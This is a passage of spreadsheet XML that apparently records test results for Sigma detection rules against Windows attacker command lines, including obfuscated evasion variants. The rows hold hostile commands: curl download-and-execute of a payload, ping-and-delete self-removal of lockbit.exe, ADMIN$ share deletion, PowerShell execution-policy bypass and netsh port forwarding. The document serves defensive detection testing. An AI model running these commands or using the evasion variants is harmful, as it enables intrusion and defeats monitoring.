      <c r="I1596" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1596" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1596" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1597" ht="15.75" customHeight="1" s="42">
      <c r="A1597" s="36" t="n"/>
      <c r="B1597" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_del_combined_execution</t>
        </is>
      </c>
      <c r="C1597" s="36" t="inlineStr">
        <is>
          <t>Suspicious Ping/Del Command Combination</t>
        </is>
      </c>
      <c r="D1597" s="36" t="inlineStr">
        <is>
          <t>54786ddc-5b8a-11ed-9b6a-0242ac120002</t>
        </is>
      </c>
      <c r="E1597" s="36" t="inlineStr">
        <is>
          <t>ping 127.0.0.1 -n 5 &gt; NUL &amp;&amp; del lockbit.exe</t>
        </is>
      </c>
      <c r="F1597" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1597" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1597" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1597" s="43" t="n"/>
      <c r="J1597" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1597" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1598" ht="15.75" customHeight="1" s="42">
      <c r="A1598" s="36" t="n"/>
      <c r="B1598" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_rmdir_execution</t>
        </is>
      </c>
      <c r="C1598" s="36" t="inlineStr">
        <is>
          <t>Directory Removal Via Rmdir</t>
        </is>
      </c>
      <c r="D1598" s="36" t="inlineStr">
        <is>
          <t>41ca393d-538c-408a-ac27-cf1e038be80c</t>
        </is>
      </c>
      <c r="E1598" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c rd /s /q C:\temp\malicious_folder</t>
        </is>
      </c>
      <c r="F1598" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1598" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1598" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1598" s="36" t="n"/>
      <c r="J1598" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1598" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1599" ht="15.75" customHeight="1" s="42">
      <c r="A1599" s="36" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B1599" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C1599" s="36" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D1599" s="36" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E1599" s="36" t="inlineStr">
        <is>
          <t>net share ADMIN$ -delete</t>
        </is>
      </c>
      <c r="F1599" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1599" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1599" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1599" s="43" t="n"/>
      <c r="J1599" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1599" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1600" ht="15.75" customHeight="1" s="42">
      <c r="A1600" s="43" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B1600" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C1600" s="36" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D1600" s="36" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E1600" s="43" t="inlineStr">
        <is>
          <t>net share ADMIN$ /del</t>
        </is>
      </c>
      <c r="F1600" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1600" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1600" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1600" s="43" t="n"/>
      <c r="J1600" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1600" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1601" ht="15.75" customHeight="1" s="42">
      <c r="A1601" s="43" t="inlineStr">
        <is>
          <t>t1070.005</t>
        </is>
      </c>
      <c r="B1601" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_share_unmount</t>
        </is>
      </c>
      <c r="C1601" s="43" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE</t>
        </is>
      </c>
      <c r="D1601" s="43" t="inlineStr">
        <is>
          <t>cb7c4a03-2871-43c0-9bbb-18bbdb079896</t>
        </is>
      </c>
      <c r="E1601" s="43" t="inlineStr">
        <is>
          <t>net "share" ADMIN$ "/delete"</t>
        </is>
      </c>
      <c r="F1601" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1601" s="43" t="inlineStr">
        <is>
          <t>Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896); Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896)</t>
        </is>
      </c>
      <c r="J1601" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1601" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1602" ht="15.75" customHeight="1" s="42">
      <c r="A1602" s="43" t="inlineStr">
        <is>
          <t>t1071</t>
        </is>
      </c>
      <c r="B1602" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C1602" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D1602" s="36" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E1602" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe oledb32.dll,OpenDSLFile C:\Users\user\Downloads\test.udl</t>
        </is>
      </c>
      <c r="F1602" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1602" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1602" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1602" s="43" t="n"/>
      <c r="J1602" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1602" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1603" ht="15.75" customHeight="1" s="42">
      <c r="A1603" s="43" t="inlineStr">
        <is>
          <t>t1071</t>
        </is>
      </c>
      <c r="B1603" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C1603" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D1603" s="43" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E1603" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile "C:\Users\admin\Downloads\test.udl"</t>
        </is>
      </c>
      <c r="F1603" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1603" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1603" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1603" s="43" t="n"/>
      <c r="J1603" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1603" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1604" ht="15.75" customHeight="1" s="42">
      <c r="A1604" s="36" t="inlineStr">
        <is>
          <t>t1071</t>
        </is>
      </c>
      <c r="B1604" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C1604" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D1604" s="36" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E1604" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile C:\ProgramData\test.udl</t>
        </is>
      </c>
      <c r="F1604" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1604" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1604" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1604" s="43" t="n"/>
      <c r="J1604" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1604" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1605" ht="15.75" customHeight="1" s="42">
      <c r="A1605" s="36" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1605" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1605" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1605" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1605" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1605" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1605" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1605" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1605" s="36" t="n"/>
      <c r="J1605" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1605" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1606" ht="15.75" customHeight="1" s="42">
      <c r="A1606" s="36" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1606" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1606" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1606" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1606" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1606" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1606" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1606" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1606" s="36" t="n"/>
      <c r="J1606" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1606" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1607" ht="15.75" customHeight="1" s="42">
      <c r="A1607" s="36" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1607" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1607" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1607" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1607" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1607" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1607" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1607" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1607" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1607" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1607" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1608" ht="15.75" customHeight="1" s="42">
      <c r="A1608" s="36" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1608" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1608" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1608" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1608" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1608" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1608" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1608" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1608" s="36" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1608" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1608" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1609" ht="15.75" customHeight="1" s="42">
      <c r="A1609" s="36" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1609" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1609" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1609" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1609" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1609" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1609" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1609" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1609" s="36" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1609" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1609" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1610" ht="15.75" customHeight="1" s="42">
      <c r="A1610" s="36" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1610" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1610" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1610" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1610" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1610" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1610" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1610" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1610" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1610" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1610" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1611" ht="15.75" customHeight="1" s="42">
      <c r="A1611" s="36" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B1611" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1611" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1611" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1611" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1611" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1611" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1611" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1611" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1611" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1611" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1612" ht="15.75" customHeight="1" s="42">
      <c r="A1612" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1612" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1612" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1612" s="36" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1612" s="43" t="inlineStr">
        <is>
          <t>secedit.exe -export /areas SECURITYPOLICY -cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F1612" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1612" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1612" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1612" s="43" t="n"/>
      <c r="J1612" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1612" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1613" ht="15.75" customHeight="1" s="42">
      <c r="A1613" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1613" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1613" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1613" s="36" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1613" s="43" t="inlineStr">
        <is>
          <t>secedit.exe "/configure" /db mytemplate.db</t>
        </is>
      </c>
      <c r="F1613" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1613" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J1613" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1613" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1614" ht="15.75" customHeight="1" s="42">
      <c r="A1614" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B1614" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C1614" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D1614" s="36" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E1614" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c secedit.exe /exp^ort /areas SECURITYPOLICY /cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F1614" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1614" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J1614" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1614" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1615" ht="15.75" customHeight="1" s="42">
      <c r="A1615" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B1615" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C1615" s="36" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1615" s="36" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E1615" s="36" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=1337 connect""port=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F1615" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1615" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1615" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1615" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J1615" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1615" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1616" ht="15.75" customHeight="1" s="42">
      <c r="A1616" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B1616" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C1616" s="36" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1616" s="36" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E1616" s="36" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=1337 connectport=1337  connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F1616" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1616" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1616" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1616" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J1616" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1616" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1617" ht="15.75" customHeight="1" s="42">
      <c r="A1617" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B1617" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1617" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1617" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1617" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c curl.exe http://example.com/payload.exe -o payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1617" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1617" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1617" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1617" s="43" t="n"/>
      <c r="J1617" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1617" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1618" ht="15.75" customHeight="1" s="42">
      <c r="A1618" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B1618" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1618" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1618" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1618" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe --OuTPut payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1618" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1618" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1618" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1618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618" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1618" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1619" ht="15.75" customHeight="1" s="42">
      <c r="A1619" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B1619" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1619" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1619" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1619" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl http://example.com/payload.exe --output payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1619" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1619" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1619" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1619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619" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1619" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1620" ht="15.75" customHeight="1" s="42">
      <c r="A1620" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B1620" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1620" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1620" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1620" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe -"-output" payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1620" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1620" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1620" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1620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620" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1620" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1621" ht="15.75" customHeight="1" s="42">
      <c r="A1621" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B1621" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1621" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1621" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1621" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1621" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1621" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1621" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1621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21" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1621" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1622" ht="15.75" customHeight="1" s="42">
      <c r="A1622" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B1622" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1622" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1622" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1622" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1622" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1622" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1622" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1622" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1622" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1622" s="36" t="b">
        <v>0</v>
      </c>
    </row>
